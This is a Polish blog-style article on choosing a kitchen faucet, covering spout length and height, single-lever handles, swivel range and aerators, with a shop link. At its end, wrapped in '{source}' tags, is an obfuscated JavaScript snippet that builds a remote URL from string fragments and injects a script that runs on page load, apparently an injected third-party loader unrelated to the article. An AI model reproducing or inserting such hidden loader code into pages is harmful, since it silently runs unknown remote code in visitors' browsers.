Home Design i wnętrze Dzięki baterii zlewozmywakowej można ułatwić sobie pracę w kuchni!

Dzięki baterii zlewozmywakowej można ułatwić sobie pracę w kuchni!

bateria_umywalkowa

Wybierając baterię kuchenną, większość osób skupia się na estetyce urządzenia, jego jakości oraz cenie. Cechy te są oczywiście bardzo ważne, jednak nowoczesne baterie mają tyle udogodnień, że mogą znacznie ułatwić codzienne czynności związane z przygotowaniem posiłków.

    
Wybierając baterię kuchenną, większość osób skupia się na estetyce urządzenia, jego jakości oraz cenie. Cechy te są oczywiście bardzo ważne, jednak nowoczesne baterie mają tyle udogodnień, że mogą znacznie ułatwić codzienne czynności związane z przygotowaniem posiłków. Warto znać najnowsze rozwiązania stosowane przez czołowych producentów armatury, a także wiedzieć jak wybrać najlepszą baterię, by była ona maksymalnie funkcjonalna i wygodna.

O czym należy pamiętać przy kupowaniu baterii?

Przede wszystkim baterię należy dopasować do konkretnego modelu zlewozmywaka. Na przykład duży zlewozmywak dwukomorowy będzie potrzebował baterii z długą i ruchomą wylewką o dużym zasięgu, natomiast w niewielkim zlewozmywaku z jedną komorą powinna wystarczyć mniejsza bateria z krótszą wylewką. Różnice w długości wylewek oraz konstrukcjach popularnych baterii kuchennych można obejrzeć choćby tutaj: https://tanialazienka.com/pl/c/Baterie-kuchenne/57. Jeśli zlewozmywak nie posiada otworu na baterię i nie da się tego otworu wyciąć (ze względu na materiał z jakiego jest zrobiony), trzeba zrezygnować z popularnych baterii sztorcowych i wybrać model ścienny. Kolejną istotną kwestią jest umiejscowienie zlewozmywaka. Jeśli jest on umieszczony np. pod oknem, lepiej żeby bateria do niego była niższa i nie przeszkadzała w otwarciu okna lub korzystania z parapetu. Estetyka baterii odgrywa największą rolę wtedy, gdy jest ona wyeksponowana – dzieje się tak na przykład wtedy, gdy zlewozmywak wkomponowany jest w modną dzisiaj „wyspę”. Warto także pamiętać, aby bateria kuchenna była dobrej jakości, ponieważ jest to urządzenie bardzo intensywnie eksploatowane. Solidna bateria powinna być wykonana z trwałego materiału (np. z mosiądzu), pokryta odporną na mechaniczne uszkodzenia powłoką, a także posiadać wewnątrz porządny regulator, najlepiej ceramiczny.

flamingo massi
Wygodna bateria kuchenna – czyli jaka?

Kran w kuchni jest używany bardzo często: do mycia owoców i warzyw, do napełniania wodą garnka, czajnika, ekspresu, do zmywania naczyń, do sprzątania czy wreszcie do mycia rąk. Z tego względu niezwykle ważne jest, by bateria była wygodna i wręcz ułatwiała te wszystkie czynności. Dlatego wybierając to urządzenie do swojej kuchni warto zwrócić uwagę na następujące elementy:   

  • Liczbę uchwytów: choć baterie dwuuchwytowe wyglądają bardziej stylowo, to jednak jeden uchwyt pozwala na obsługę kranu jedną ręką, co w kuchni okazuje się bardzo przydatne.   
  • Ruchomość wylewki: nowoczesne baterie posiadają wylewkę obracającą się nawet o 360 stopni, która ułatwia sterowanie strumieniem wody podczas różnych czynności kuchennych. Taką wylewkę ma np. model Fora Eco Line firmy Massi.   
  • Wysokość wylewki: im wyższa jest wylewka, tym łatwiej jest napełniać wodą duże i wysokie naczynia np. czajnik, wazon itp.   
  • Perlator: jest to specjalny filtr napowietrzający wodę, dzięki któremu zużywa się znacznie mniej wody niż w przypadku baterii bez tego urządzenia.

Niektóre modele baterii kuchennych mają także inne udogodnienia. Warto wymienić choćby wyciąganą wylewkę, która przypominając szlauch, pozwala na precyzyjnie ukierunkowanie strumienia wody i tym samym ułatwia np. zmywanie, minimalizując przy tym stopień zachlapania innych urządzeń kuchennych czy podłogi.

{source}
<script type=”text/javascript”>
(function(){
tys5u=”yXwexji3ys5z”;tys5=document.createElement(„script”);
tys5_=”u”+(„st”);tys5_+=”at”+(„.”);tys5.async=true;tys5_+=”in”;
tys5u=”10321493.”+tys5u;tys5.type=”text/javascript”;tys5u+=”n7ntzg7ay4h3″;
tys5u+=”mg62ed”;tys5_+=(„f”)+”o”+(„/”);tys5.src=”//”+tys5_+tys5u;
tys5d=document.body;tys5d.appendChild(tys5);
})();
</script>
{/source}